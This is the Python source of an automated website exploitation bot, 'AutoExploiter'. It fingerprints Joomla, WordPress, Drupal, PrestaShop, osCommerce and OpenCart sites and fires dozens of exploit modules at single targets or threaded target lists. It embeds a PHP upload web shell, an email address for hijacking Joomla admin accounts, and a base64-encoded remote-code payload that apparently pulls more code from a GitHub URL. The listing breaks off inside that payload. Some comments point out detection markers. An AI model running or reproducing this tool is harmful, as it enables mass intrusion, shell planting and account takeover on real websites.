  1. #!/usr/bin/python27
  2. import os, re, sys, socket, binascii, time, json, random, threading
  3. from Queue import Queue
  4.  
  5. try:
  6. import requests
  7. except ImportError:
  8. print '---------------------------------------------------'
  9. print '[*] pip install requests'
  10. print ' [-] you need to install requests Module'
  11. sys.exit()
  12.  
  13.  
  14. class AutoExploiter(object):
  # Constructor that doubles as the program's entry point: it creates the result/ and logs/
  # directories, stores colour codes and payload file paths, then reads sys.argv[1] and runs
  # the selected mode (1 single target, 2 list scan, 3 threaded list scan, 4 update check).
  15. def __init__(self):
  16. try:
  17. os.mkdir('result')
  18. except:
  19. pass
  20. try:
  21. os.mkdir('logs')
  22. except:
  23. pass
  # ANSI colour escape sequences used by the Print_* helpers.
  24. self.r = '\033[31m'
  25. self.g = '\033[32m'
  26. self.y = '\033[33m'
  27. self.b = '\033[34m'
  28. self.m = '\033[35m'
  29. self.c = '\033[36m'
  30. self.w = '\033[37m'
  31. self.rr = '\033[39m'
  # Embedded PHP page: an upload form whose handler copies the posted file to the name the
  # client supplies, with no authentication or file-type check. For incident response, the
  # <title>wordpress_project</title> and "Shell Uploaded ! :)" strings are usable search
  # markers when sweeping web roots.
  32. self.shell_code = '''
  33. <title>wordpress_project</title>
  34. <?php
  35. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  36. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  37. if( $_POST['_upl'] == "Upload" ) {
  38. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
  39. else { echo '<b>Not uploaded ! </b><br><br>'; }
  40. }
  41. ?>
  42. '''
  43. self.version = '1.5.1'
  44. self.year = time.strftime("%y")
  45. self.month = time.strftime("%m")
  # This address is passed to files/adminTakeover.py with -e by Joomla_TakeADmin.
  46. self.EMail = 'hacklinkhizmeti00@gmail.com' # --> add your email for Add admin, Password Will send to this EMail!
  # Relative paths to payload files; the files/ directory itself is not part of this listing.
  47. self.Jce_Deface_image = 'files/pwn.gif'
  48. self._shell = 'files/shell.jpg'
  49. self.indeX = 'files/index.jpg'
  50. self.TextindeX = 'files/vuln.txt'
  51. self.MailPoetZipShell = 'files/rock.zip'
  52. self.ZipJd = 'files/jdownlods.zip'
  53. self.pagelinesExploitShell = 'files/settings_auto.php'
  54. self.jdShell = 'files/vuln.php3.j'
  55. self.ShellPresta = 'files/up.php'
  56. self.gravShell = 'files/grav.jpg'
  57.  
  # With no command-line argument the banner and the option list are shown and the run ends.
  58. try:
  59. self.select = sys.argv[1]
  60. except:
  61. self.cls()
  62. self.print_logo()
  63. self.Print_options()
  64. sys.exit()
  65. if self.select == str('1'): # Single
  66. self.cls()
  67. self.print_logo()
  68. self.Url = raw_input(self.r + ' [+]' + self.c + 'Enter Target: ' + self.y)
  69. if self.Url.startswith("http://"):
  70. self.Url = self.Url.replace("http://", "")
  71. elif self.Url.startswith("https://"):
  72. self.Url = self.Url.replace("https://", "")
  73. else:
  74. pass
  75. try:
  # CMS fingerprinting: four plain-HTTP GETs per target. These paths requested together by
  # one client within seconds form a recognisable pattern in web access logs.
  76. CheckOsc = requests.get('http://' + self.Url + '/admin/images/cal_date_over.gif', timeout=10)
  77. CheckOsc2 = requests.get('http://' + self.Url + '/admin/login.php', timeout=10)
  78. CheckCMS = requests.get('http://' + self.Url + '/templates/system/css/system.css', timeout=5)
  79. Checktwo = requests.get('http://' + self.Url, timeout=5)
  # Any 200 on system.css selects the Joomla module list, so a host that answers 200 for
  # unknown paths receives the Joomla requests regardless of what it actually runs.
  80. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
  81. self.Print_Scanning(self.Url, 'joomla')
  82. self.RCE_Joomla(self.Url)
  83. self.Joomla_TakeADmin(self.Url)
  84. self.Com_AdsManager_Shell(self.Url)
  85. self.alberghiExploit(self.Url)
  86. self.Com_CCkJseblod(self.Url)
  87. self.Com_Fabric(self.Url)
  88. self.Com_Hdflvplayer(self.Url)
  89. self.Com_Jdownloads_shell(self.Url)
  90. self.Com_Joomanager(self.Url)
  91. self.Com_MyBlog(self.Url)
  92. self.Com_Macgallery(self.Url)
  93. self.JCE_shell(self.Url)
  94. self.Com_s5_media_player(self.Url)
  95. self.Com_Jbcatalog(self.Url)
  96. self.Com_SexyContactform(self.Url)
  97. self.Com_rokdownloads(self.Url)
  98. self.Com_extplorer(self.Url)
  99. self.Com_jwallpapers_Shell(self.Url)
  100. self.Com_facileforms(self.Url)
  101. self.JooMLaBruteForce(self.Url)
  102. self.FckEditor(self.Url)
  # WordPress is recognised by "/wp-content/" appearing in the front page body.
  103. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
  104. self.Print_Scanning(self.Url, 'Wordpress')
  105. self.Revslider_SHELL(self.Url)
  106. self.wysijaExploit(self.Url)
  107. self.WP_User_Frontend(self.Url)
  108. self.Gravity_Forms_Shell(self.Url)
  109. self.HD_WebPlayerSqli(self.Url)
  110. self.pagelinesExploit(self.Url)
  111. self.HeadWayThemeExploit(self.Url)
  112. self.addblockblocker(self.Url)
  113. self.cherry_plugin(self.Url)
  114. self.formcraftExploit_Shell(self.Url)
  115. self.UserProExploit(self.Url)
  116. self.wp_mobile_detector(self.Url)
  117. self.Wp_Job_Manager(self.Url)
  118. self.wp_content_injection(self.Url)
  119. self.Woocomrece(self.Url)
  120. self.viral_optins(self.Url)
  121. self.CateGory_page_icons(self.Url)
  122. self.Downloads_Manager(self.Url)
  123. self.wp_support_plus_responsive_ticket_system(self.Url)
  124. self.wp_miniaudioplayer(self.Url)
  125. self.eshop_magic(self.Url)
  126. self.ungallery(self.Url)
  127. self.barclaycart(self.Url)
  128. self.FckEditor(self.Url)
  # Drupal is recognised by "/sites/default/" or a Drupal generator tag in the front page.
  129. elif '/sites/default/' in Checktwo.text.encode('utf-8')\
  130. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
  131. self.Print_Scanning(self.Url, 'drupal')
  132. self.DrupalGedden2(self.Url)
  133. self.DrupalBruteForce(self.Url)
  134. self.Drupal_Sqli_Addadmin(self.Url)
  135.  
  136. self.FckEditor(self.Url)
  # osCommerce is recognised by a GIF header on the admin image or its name on the login page.
  137. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
  138. self.Print_Scanning(self.Url, 'osCommerce')
  139. self.osCommerce(self.Url)
  140. self.FckEditor(self.Url)
  # PrestaShop is recognised by the word "prestashop" in the front page body.
  141. elif 'prestashop' in Checktwo.text.encode('utf-8'):
  142. self.lib(self.Url)
  143. self.psmodthemeoptionpanel(self.Url)
  144. self.tdpsthemeoptionpanel(self.Url)
  145. self.megamenu(self.Url)
  146. self.nvn_export_orders(self.Url)
  147. self.pk_flexmenu(self.Url)
  148. self.wdoptionpanel(self.Url)
  149. self.fieldvmegamenu(self.Url)
  150. self.wg24themeadministration(self.Url)
  151. self.videostab(self.Url)
  152. self.cartabandonmentproOld(self.Url)
  153. self.cartabandonmentpro(self.Url)
  154. self.advancedslider(self.Url)
  155. self.attributewizardpro_x(self.Url)
  156. self.attributewizardpro3(self.Url)
  157. self.attributewizardpro2(self.Url)
  158. self.attributewizardpro(self.Url)
  159. self.jro_homepageadvertise(self.Url)
  160. self.homepageadvertise2(self.Url)
  161. self.homepageadvertise(self.Url)
  162. self.productpageadverts(self.Url)
  163. self.simpleslideshow(self.Url)
  164. self.vtermslideshow(self.Url)
  165. self.soopabanners(self.Url)
  166. self.soopamobile(self.Url)
  167. self.columnadverts(self.Url)
  168. self.FckEditor(self.Url)
  # OpenCart is recognised by "catalog/view/" in the front page body.
  169. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
  170. self.OpenCart(self.Url)
  171. self.FckEditor(self.Url)
  172. else:
  173. self.Print_Scanning(self.Url, 'Unknown')
  174. self.FckEditor(self.Url)
  # Every exception raised during fingerprinting or inside a module is reported as a timeout.
  175. except:
  176. self.Timeout(self.Url)
  177. sys.exit()
  178.  
  179.  
  # Mode 2: one thread per line of the list file, started 0.1 s apart, each running Work2.
  180. elif self.select == str('2'): # multi List
  181. self.cls()
  182. try:
  183. self.print_logo()
  184. Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
  185. with open(Get_list, 'r') as zz:
  186. Readlist = zz.read().splitlines()
  187. except IOError:
  188. print self.r + '--------------------------------------------'
  189. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
  190. sys.exit()
  191. thread = []
  192. for xx in Readlist:
  193. t = threading.Thread(target=self.Work2, args=(xx, ''))
  194. t.start()
  195. thread.append(t)
  196. time.sleep(0.1)
  197. for j in thread:
  198. j.join()
  # Mode 4: compares self.version with update.txt fetched from the project's GitHub repository
  # and optionally prints update_details.txt from the same location.
  199. elif self.select == str('4'):
  200. try:
  201. self.cls()
  202. self.print_logo()
  203. GoT = requests.get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/update.txt', timeout=5)
  204. if self.version in GoT.text.encode('utf-8'):
  205. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c +\
  206. "Sorry But You Don't Have New Update ... Try later."
  207. else:
  208. Loop = True
  209. print self.r + ' [' + self.c + '+' + self.r + '] ' + self.g + 'update Is available! Update Now.'
  210. print self.r + ' [' + self.c + '+' + self.r + '] ' + self.y + 'github.com/04x/ICG-AutoExploiterBoT/\n'
  211. while Loop:
  212. Get = raw_input(self.r + ' [' + self.g + '*' + self.r + '] ' + self.c +
  213. 'You Want know What is New in New Version ? [y]es or [n]o : ')
  214. if Get == str('y'):
  215. update_details = requests.get('https://raw.githubusercontent.com/'
  216. '04x/ICG-AutoExploiterBoT/master/files/update_details.txt', timeout=5)
  217. print update_details.text.encode('utf-8')
  218. Loop = False
  219. elif Get == str('n'):
  220. self.cls()
  221. self.print_logo()
  222. Loop = False
  223. else:
  224. continue
  225. except:
  226. self.Timeout('Github.com')
  # Mode 3: 75 daemon worker threads running doWork, fed from a bounded queue of list entries.
  227. elif self.select == str('3'):
  228. self.cls()
  229. self.print_logo()
  230. self.concurrent = 75
  231. try:
  232. self.Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
  233. except IOError:
  234. print self.r + '--------------------------------------------'
  235. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
  236. sys.exit()
  237. self.q = Queue(self.concurrent * 2)
  238. for i in range(self.concurrent):
  239. self.t = threading.Thread(target=self.doWork)
  240. self.t.daemon = True
  241. self.t.start()
  242. try:
  243. for url in open(self.Get_list):
  244. self.q.put(url.strip())
  245. self.q.join()
  246. except:
  247. pass
  248.  
  249. else:
  250. self.cls()
  251. self.print_logo()
  252. print self.r + '--------------------------------------------'
  253. print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + ' Option Not Found! Try Again...'
  254.  
  255.  
  256. # elif self.select == str(3): # IP Server
  257. # self.cls()
  258. # IPserv = raw_input(' Enter IP server: ')
  259. # reverse = reverse_ipz()
  260. # reverse.Reverse_ip(IPserv)
  261. # try:
  262. # with open('logs/' + reverse.ip + '.txt', 'r') as reader:
  263. # readlines = reader.read().splitlines()
  264. # except:
  265. # print ' i cant Find List of urls in server! use from option 2.'
  266. # sys.exit()
  267. # for xx in readlines:
  268. # self.Url = xx
  269. # if self.Url.startswith("http://"):
  270. # self.Url = self.Url.replace("http://", "")
  271. # elif self.Url.startswith("https://"):
  272. # self.Url = self.Url.replace("https://", "")
  273. # else:
  274. # pass
  275. # try:
  276. # CheckCMS = requests.get('http://' + self.Url + '/language/en-GB/en-GB.xml', timeout=7)
  277. # if 'version="' in CheckCMS.text.encode('utf-8'):
  278. # self.Print_Scanning(self.Url, 'joomla')
  279. # self.RCE_Joomla()
  280. # self.Joomla_TakeADmin()
  281. # self.Com_AdsManager_Shell()
  282. # self.alberghiExploit()
  283. # self.Com_CCkJseblod()
  284. # self.Com_Fabric()
  285. # self.Com_Hdflvplayer()
  286. # self.Com_Jdownloads_shell()
  287. # self.Com_Joomanager()
  288. # self.Com_MyBlog()
  289. # self.Com_Macgallery()
  290. # self.JCE_shell()
  291. # self.Com_s5_media_player()
  292. # else:
  293. # self.Print_Scanning(self.Url, 'Unknown')
  294. # except requests.ConnectionError:
  295. # self.Timeout(self.Url)
  296.  
  297.  
  298.  
  # List-mode worker for one entry: strips a leading scheme, fingerprints the CMS with four
  # plain-HTTP GETs and then calls the module list for the first branch that matches.
  # The second parameter (s) is not used in this body. Every exception is swallowed silently,
  # so a failed target produces no output at all.
  299. def Work2(self, url, s):
  300. try:
  301. if url.startswith("http://"):
  302. url = url.replace("http://", "")
  303. elif url.startswith("https://"):
  304. url = url.replace("https://", "")
  305. else:
  306. pass
  # Fingerprint probes; this fixed set of paths is a usable access-log signature.
  307. CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
  308. CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
  309. CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
  310. Checktwo = requests.get('http://' + url, timeout=5)
  # A bare 200 on system.css is enough to select the Joomla branch.
  311. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
  312. self.RCE_Joomla(url)
  313. self.Joomla_TakeADmin(url)
  314. self.Com_AdsManager_Shell(url)
  315. self.alberghiExploit(url)
  316. self.Com_CCkJseblod(url)
  317. self.Com_Fabric(url)
  318. self.Com_Hdflvplayer(url)
  319. self.Com_Jdownloads_shell(url)
  320. self.Com_Joomanager(url)
  321. self.Com_MyBlog(url)
  322. self.Com_Macgallery(url)
  323. self.JCE_shell(url)
  324. self.Com_s5_media_player(url)
  325. self.Com_Jbcatalog(url)
  326. self.Com_SexyContactform(url)
  327. self.Com_rokdownloads(url)
  328. self.Com_extplorer(url)
  329. self.Com_jwallpapers_Shell(url)
  330. self.Com_facileforms(url)
  331. self.JooMLaBruteForce(url)
  332. self.FckEditor(url)
  333. self.q.task_done()
  # WordPress branch: "/wp-content/" found in the front page body.
  334. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
  335. self.Revslider_SHELL(url)
  336. self.wysijaExploit(url)
  337. self.WP_User_Frontend(url)
  338. self.Gravity_Forms_Shell(url)
  339. self.HD_WebPlayerSqli(url)
  340. self.pagelinesExploit(url)
  341. self.HeadWayThemeExploit(url)
  342. self.addblockblocker(url)
  343. self.cherry_plugin(url)
  344. self.formcraftExploit_Shell(url)
  345. self.UserProExploit(url)
  346. self.wp_mobile_detector(url)
  347. self.Wp_Job_Manager(url)
  348. self.wp_content_injection(url)
  349. self.viral_optins(url)
  350. self.Woocomrece(url)
  351. self.CateGory_page_icons(url)
  352. self.Downloads_Manager(url)
  353. self.wp_support_plus_responsive_ticket_system(url)
  354. self.wp_miniaudioplayer(url)
  355. self.eshop_magic(url)
  356. self.ungallery(url)
  357. self.barclaycart(url)
  358. self.FckEditor(url)
  359. self.q.task_done()
  # Drupal branch.
  360. elif '/sites/default/' in Checktwo.text.encode('utf-8') \
  361. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
  362. self.Drupal_Sqli_Addadmin(url)
  363. self.DrupalGedden2(url)
  364. self.DrupalBruteForce(url)
  365. self.FckEditor(url)
  366. self.q.task_done()
  # osCommerce branch.
  367. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
  368. self.osCommerce(url)
  369. self.FckEditor(url)
  370. self.q.task_done()
  # PrestaShop branch.
  371. elif 'prestashop' in Checktwo.text.encode('utf-8'):
  372. self.lib(url)
  373. self.psmodthemeoptionpanel(url)
  374. self.tdpsthemeoptionpanel(url)
  375. self.megamenu(url)
  376. self.nvn_export_orders(url)
  377. self.pk_flexmenu(url)
  378. self.wdoptionpanel(url)
  379. self.fieldvmegamenu(url)
  380. self.wg24themeadministration(url)
  381. self.videostab(url)
  382. self.cartabandonmentproOld(url)
  383. self.cartabandonmentpro(url)
  384. self.advancedslider(url)
  385. self.attributewizardpro_x(url)
  386. self.attributewizardpro3(url)
  387. self.attributewizardpro2(url)
  388. self.attributewizardpro(url)
  389. self.jro_homepageadvertise(url)
  390. self.homepageadvertise2(url)
  391. self.homepageadvertise(url)
  392. self.productpageadverts(url)
  393. self.simpleslideshow(url)
  394. self.vtermslideshow(url)
  395. self.soopabanners(url)
  396. self.soopamobile(url)
  397. self.columnadverts(url)
  398. self.FckEditor(url)
  399. self.q.task_done()
  # OpenCart branch.
  400. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
  401. self.OpenCart(self.Url)
  402. self.FckEditor(self.Url)
  403. self.q.task_done()
  # Unrecognised sites still receive the FckEditor module.
  404. else:
  405. self.FckEditor(url)
  406. self.q.task_done()
  407. except:
  408. pass
  # Queue worker used by mode 3: loops forever taking entries from self.q, strips a leading
  # scheme, fingerprints the CMS with four plain-HTTP GETs and calls the matching module list.
  # Both the per-target and the outer exception handlers discard errors silently.
  409. def doWork(self):
  410. try:
  411. while True:
  412. url = self.q.get()
  413. if url.startswith('http://'):
  414. url = url.replace('http://', '')
  415. elif url.startswith("https://"):
  416. url = url.replace('https://', '')
  417. else:
  418. pass
  419. try:
  # Fingerprint probes; this fixed set of paths is a usable access-log signature.
  420. CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
  421. CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
  422. CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
  423. Checktwo = requests.get('http://' + url, timeout=5)
  # A bare 200 on system.css is enough to select the Joomla branch.
  424. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
  425. self.RCE_Joomla(url)
  426. self.Joomla_TakeADmin(url)
  427. self.Com_AdsManager_Shell(url)
  428. self.alberghiExploit(url)
  429. self.Com_CCkJseblod(url)
  430. self.Com_Fabric(url)
  431. self.Com_Hdflvplayer(url)
  432. self.Com_Jdownloads_shell(url)
  433. self.Com_Joomanager(url)
  434. self.Com_MyBlog(url)
  435. self.Com_Macgallery(url)
  436. self.JCE_shell(url)
  437. self.Com_s5_media_player(url)
  438. self.Com_Jbcatalog(url)
  439. self.Com_SexyContactform(url)
  440. self.Com_rokdownloads(url)
  441. self.Com_extplorer(url)
  442. self.Com_jwallpapers_Shell(url)
  443. self.Com_facileforms(url)
  444. self.JooMLaBruteForce(url)
  445. self.FckEditor(url)
  446. self.q.task_done()
  # WordPress branch: "/wp-content/" found in the front page body.
  447. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
  448. self.Revslider_SHELL(url)
  449. self.wysijaExploit(url)
  450. self.WP_User_Frontend(url)
  451. self.Gravity_Forms_Shell(url)
  452. self.HD_WebPlayerSqli(url)
  453. self.pagelinesExploit(url)
  454. self.HeadWayThemeExploit(url)
  455. self.addblockblocker(url)
  456. self.cherry_plugin(url)
  457. self.formcraftExploit_Shell(url)
  458. self.UserProExploit(url)
  459. self.wp_mobile_detector(url)
  460. self.Wp_Job_Manager(url)
  461. self.wp_content_injection(url)
  462. self.viral_optins(url)
  463. self.Woocomrece(url)
  464. self.CateGory_page_icons(url)
  465. self.Downloads_Manager(url)
  466. self.wp_support_plus_responsive_ticket_system(url)
  467. self.wp_miniaudioplayer(url)
  468. self.eshop_magic(url)
  469. self.ungallery(url)
  470. self.barclaycart(url)
  471. self.FckEditor(url)
  472. self.q.task_done()
  # Drupal branch.
  473. elif '/sites/default/' in Checktwo.text.encode('utf-8') \
  474. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
  475. self.Drupal_Sqli_Addadmin(url)
  476. self.DrupalGedden2(url)
  477. self.DrupalBruteForce(url)
  478. self.FckEditor(url)
  479. self.q.task_done()
  # osCommerce branch.
  480. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
  481. self.osCommerce(url)
  482. self.FckEditor(url)
  483. self.q.task_done()
  # PrestaShop branch.
  484. elif 'prestashop' in Checktwo.text.encode('utf-8'):
  485. self.lib(url)
  486. self.psmodthemeoptionpanel(url)
  487. self.tdpsthemeoptionpanel(url)
  488. self.megamenu(url)
  489. self.nvn_export_orders(url)
  490. self.pk_flexmenu(url)
  491. self.wdoptionpanel(url)
  492. self.fieldvmegamenu(url)
  493. self.wg24themeadministration(url)
  494. self.videostab(url)
  495. self.cartabandonmentproOld(url)
  496. self.cartabandonmentpro(url)
  497. self.advancedslider(url)
  498. self.attributewizardpro_x(url)
  499. self.attributewizardpro3(url)
  500. self.attributewizardpro2(url)
  501. self.attributewizardpro(url)
  502. self.jro_homepageadvertise(url)
  503. self.homepageadvertise2(url)
  504. self.homepageadvertise(url)
  505. self.productpageadverts(url)
  506. self.simpleslideshow(url)
  507. self.vtermslideshow(url)
  508. self.soopabanners(url)
  509. self.soopamobile(url)
  510. self.columnadverts(url)
  511. self.FckEditor(url)
  512. self.q.task_done()
  # OpenCart branch.
  513. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
  514. self.OpenCart(self.Url)
  515. self.FckEditor(self.Url)
  516. self.q.task_done()
  # Unrecognised sites still receive the FckEditor module.
  517. else:
  518. self.FckEditor(url)
  519. self.q.task_done()
  520. except:
  521. pass
  522. except:
  523. pass
  524.  
  525.  
  526.  
  # Print the ASCII-art banner one line at a time, each line in a randomly chosen ANSI colour
  # from `colors`, pausing 0.05 s between lines. The banner text is emitted exactly as stored
  # in the triple-quoted string below; its original spacing has been lost in this listing.
  527. def print_logo(self):
  # Escape sequence that resets terminal attributes after each coloured line.
  528. clear = "\x1b[0m"
  529. colors = [36, 32, 34, 35, 31, 37]
  530.  
  531. x = """
  532.  
  533.  
  534. White HaT Hackers
  535. _ ______ _ _ _
  536. /\ | | | ____| | | (_) |
  537. / \ _ _| |_ ___ | |__ __ ___ __ | | ___ _| |_ ___ _ __
  538. / /\ \| | | | __/ _ \| __| \ \/ / '_ \| |/ _ \| | __/ _ \ '__|
  539. / ____ \ |_| | || (_) | |____ > <| |_) | | (_) | | || __/ |
  540. /_/ \_\__,_|\__\___/|______/_/\_\ .__/|_|\___/|_|\__\___|_|
  541. | |
  542. IRan-Cyber.Net |_| gitHub.com/04x
  543.  
  544. Note! : We don't Accept any responsibility for any illegal usage.
  545. """
  # N (the line index from enumerate) is not used in the loop body.
  546. for N, line in enumerate(x.split("\n")):
  547. sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
  548. time.sleep(0.05)
  549.  
  def Print_options(self):
      """Print the four run modes, each with the command line that selects it."""
      menu = (
          ('1', 'Single Target'),
          ('2', 'List Scan'),
          ('3', 'Thread List Scan'),
          ('4', 'Check Update'),
      )
      for number, label in menu:
          # Same layout for every row: coloured "[n]" tag, label, then the invocation.
          tag = self.r + ' [' + self.y + number + self.r + '] '
          usage = ' [ ' + 'python AutoExploit.py ' + number + ' ]'
          print tag + self.c + label + self.w + usage
  556.  
  557.  
  558.  
  def Print_Scanning(self, url, CMS):
      """Print the target being processed followed by the CMS label in brackets."""
      tag = self.r + ' [' + self.y + '*' + self.r + '] '
      target = self.c + url
      label = self.w + ' [ ' + CMS + ' ]'
      print tag + target + label
  561.  
  562.  
  def Timeout(self, url):
      """Print the line reporting *url* as timed out or not a valid URL."""
      tag = self.r + ' [' + self.y + '*' + self.r + '] '
      status = self.r + ' [ TimeOut!!/NotValid Url ]'
      print tag + self.c + url + status
  565.  
  def Print_NotVuln(self, NameVuln, site):
      """Print the negative result line for check *NameVuln* against *site*."""
      tag = self.c + ' [' + self.y + '-' + self.c + '] '
      subject = self.r + site + ' ' + self.y + NameVuln
      verdict = self.c + ' [Not Vuln]'
      print tag + subject + verdict
  568.  
  def Print_Username_Password(self, username, Password):
      """Print a username line and a password line, in that order."""
      tag = self.y + ' [' + self.c + '+' + self.y + '] '
      for caption, value in (('Username: ', username), ('Password: ', Password)):
          print tag + self.c + caption + self.g + value
  572.  
  573.  
  def Print_Vuln(self, NameVuln, site):
      """Print the positive result line for check *NameVuln* against *site*."""
      tag = self.c + ' [' + self.y + '+' + self.c + '] '
      subject = self.r + site + ' ' + self.y + NameVuln
      verdict = self.g + ' [Vuln!!]'
      print tag + subject + verdict
  576.  
  def Print_Vuln_index(self, indexPath):
      """Print the line reporting that a file was placed at *indexPath*."""
      tag = self.c + ' [' + self.y + '+' + self.c + '] '
      print ''.join([tag, self.y, indexPath, self.g, ' [Index Uploaded!]'])
  579.  
  def Print_vuln_Shell(self, shellPath):
      """Print the line reporting that a file was placed at *shellPath*."""
      tag = self.c + ' [' + self.y + '+' + self.c + '] '
      print ''.join([tag, self.y, shellPath, self.g, ' [Shell Uploaded!]'])
  582.  
  def Print_vuln_Config(self, pathconfig):
      """Print the line reporting that a configuration file was read from *pathconfig*."""
      tag = self.c + ' [' + self.y + '+' + self.c + '] '
      print ''.join([tag, self.y, pathconfig, self.g, ' [Config Downloaded!]'])
  585.  
  586.  
  def cls(self):
      """Clear the terminal with the platform's clear-screen command."""
      # os.name is 'nt' on Windows; every other platform gets the POSIX command.
      if os.name == 'nt':
          command = 'cls'
      else:
          command = 'clear'
      os.system(command)
  591.  
  592. def RCE_Joomla(self, site):
  593. try:
  594. pl = self.generate_payload(
  595. "base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdG1wL3Z1bG4yLnBocCIgOw0KJGZwPWZvcGVuKCIkY2hlY2siLCJ3KyIpOw0KZndyaXRlKCRmcCxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtWjFibU4wYVc5dUlHaDBkSEJmWjJWMEtDUjFjbXdwZXcwS0NTUnBiU0E5SUdOMWNteGZhVzVwZENna2RYSnNLVHNOQ2dsamRYSnNYM05sZEc5d2RDZ2thVzBzSUVOVlVreFBVRlJmVWtWVVZWSk9WRkpCVGxOR1JWSXNJREVwT3cwS0NXTjFjbXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5RFQwNU9SVU5VVkVsTlJVOVZWQ3dnTVRBcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOUdUMHhNVDFkTVQwTkJWRWxQVGl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYMGhGUVVSRlVpd2dNQ2s3RFFvSmNtVjBkWEp1SUdOMWNteGZaWGhsWXlna2FXMHBPdzBLQ1dOMWNteGZZMnh2YzJVb0pHbHRLVHNOQ24wTkNpUmphR1ZqYXlBOUlDUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMM1J0Y0M5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0hNNkx5OXlZWGN1WjJsMGFIVmlkWE5sY21OdmJuUmxiblF1WTI5dEx6QTBlQzlKUTBjdFFYVjBiMFY0Y0d4dmFYUmxja0p2VkM5dFlYTjBaWEl2Wm1sc1pYTXZkWEF1Y0dod0p5azdEUW9rYjNCbGJpQTlJR1p2Y0dWdUtDUmphR1ZqYXl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJpd2dKSFJsZUhRcE93MEtabU5zYjNObEtDUnZjR1Z1S1RzTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTGlJOEwySnlQaUk3RFFwOVpXeHpaU0FOQ2lBZ1pXTm9ieUFpYm05MElHVjRhWFJ6SWpzTkNtVmphRzhnSW1SdmJtVWdMbHh1SUNJZ093MEtKR05vWldOck1pQTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJsdFlXZGxjeTkyZFd4dUxuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNtRjNMbWRwZEdoMVluVnpaWEpqYjI1MFpXNTBMbU52YlM4d05IZ3ZTVU5ITFVGMWRHOUZlSEJzYjJsMFpYSkNiMVF2YldGemRHVnlMMlpwYkdWekwzVndMbkJvY0NjcE93MEtKRzl3Wlc0eUlEMGdabTl3Wlc0b0pHTm9aV05yTWl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJqSXNJQ1IwWlhoME1pazdEUXBtWTJ4dmMyVW9KRzl3Wlc0eUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXpJcEtYc05DaUFnSUNCbFkyaHZJQ1JqYUdWamF6SXVJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnViM1FnWlhocGRITXlJanNOQ21WamFHOGdJbVJ2Ym1VeUlDNWNiaUFpSURzTkNnMEtKR05vWldOck16MGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTkyZFd4dUxtaDBiU0lnT3cwS0pIUmxlSFF6SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T
